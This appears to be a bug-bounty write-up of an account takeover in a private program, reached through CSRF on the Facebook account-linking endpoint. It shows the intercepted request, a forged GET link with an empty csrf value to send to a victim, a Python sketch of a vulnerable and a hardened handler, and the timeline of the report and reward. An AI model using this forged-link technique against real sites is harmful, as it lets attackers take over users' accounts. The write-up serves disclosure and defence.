
Vulnerability – Account takeover using OAuth Misconfiguration

About OAuth

OAuth is an open standard for access delegation, commonly used as a way for Internet users to grant websites or applications access to their information on other websites but without giving them the passwords. This mechanism is used by companies such as Google, Facebook, Microsoft and Twitter to permit the users to share information about their accounts with third party applications or websites.

Generally, OAuth provides clients with “secure delegated access” to server resources on behalf of a resource owner. It specifies a process for resource owners to authorize third-party access to their server resources without sharing their credentials. Designed specifically to work with Hypertext Transfer Protocol (HTTP), OAuth essentially allows access tokens to be issued to third-party clients by an authorization server, with the approval of the resource owner. The third party then uses the access token to access the protected resources hosted by the resource server.

Case Study

As this was a private program, all illustrations of the vulnerability use example.com as the host.

The application had a Registration page where a user could register a new username and password which allowed him to log in to the application via the login page.

After successful registration, you are redirected to the profile page, where you need to fill in some more details about yourself, and you are good to go.

In the account section, you have the option to link your Facebook or LinkedIn account.

When you click on "link Facebook", you will be redirected to Facebook.com, where you need to click on "authorize this app".

Click on authorize and intercept the request. The request looks something like this:

POST /facebook/couple HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 293
Connection: close
Cookie:

action=couple&access_token=EAAcfyakm,smvnoqgrfuabvkscbvkjwer97823lasnvc9274qyrfhslnc9284fghlcv2bksacvbkisdasbksdbvkbsdkf78asdfbvsda87fsaddbv978sdfbd98sabv98sdvb4hfnsc932fofn4209qytf03fhnbc92y0fhgbce972y308hc92qyf&csrf=98798asfdcasf7d98s7adf98s7df98a7sdf9

As you can see, the POST request carries a CSRF token. The token can be omitted by changing the POST request to a GET request, something like this:

https://www.example.com/facebook/couple?action=couple&access_token=EAAcfyakm,smvnoqgrfuabvkscbvkjwer97823lasnvc9274qyrfhslnc9284fghlcv2bksacvbkisdasbksdbvkbsdkf78asdfbvsda87fsaddbv978sdfbd98sabv98sdvb4hfnsc932fofn4209qytf03fhnbc92y0fhgbce972y308hc92qy&csrf=

Send this link to the victim. As soon as the victim visits the link, his/her account will be linked to your Facebook account, and you can access it with the "Login with Facebook" option.
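A sketch of the server-side fix for the behaviour described above, as an added example that is not the application's own code. The handler names, the session layout and the assumption that the CSRF check ran only for POST requests are hypothetical; the sample request is constructed.

```python
import hmac
import secrets

def couple_vulnerable(method, params, session):
    """Assumed flaw: the CSRF token is verified only on POST, so the same
    action sent as GET links the account with no token check at all."""
    if method == "POST" and params.get("csrf") != session["csrf"]:
        return 403
    session["linked_facebook_token"] = params.get("access_token")
    return 200

def couple_hardened(method, params, session):
    """Account linking changes state: accept POST only, always require the token."""
    if method != "POST":
        return 405  # never change state on GET
    sent = params.get("csrf") or ""
    expected = session.get("csrf") or ""
    # Empty or missing tokens fail; compare in constant time.
    if not sent or not expected:
        return 403
    if not hmac.compare_digest(sent.encode(), expected.encode()):
        return 403
    session["linked_facebook_token"] = params.get("access_token")
    return 200

def demo():
    # Constructed sample: the GET form of the request with an empty csrf value,
    # arriving inside a logged-in user's session.
    forged = {"action": "couple", "access_token": "TOKEN_PLACEHOLDER", "csrf": ""}
    results = {}
    for name, handler in (("vulnerable", couple_vulnerable),
                          ("hardened", couple_hardened)):
        session = {"csrf": secrets.token_hex(16)}
        status = handler("GET", forged, session)
        results[name] = (status, "linked_facebook_token" in session)
    return results

if __name__ == "__main__":
    print(demo())
```

The same rule applies to the OAuth flow itself: binding the authorization request to the user's session with the `state` parameter keeps a link request from being completed in someone else's session.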

Reported: 3 March 2020
Responded: 4 March 2020
Rewarded: $300, 6 March 2020
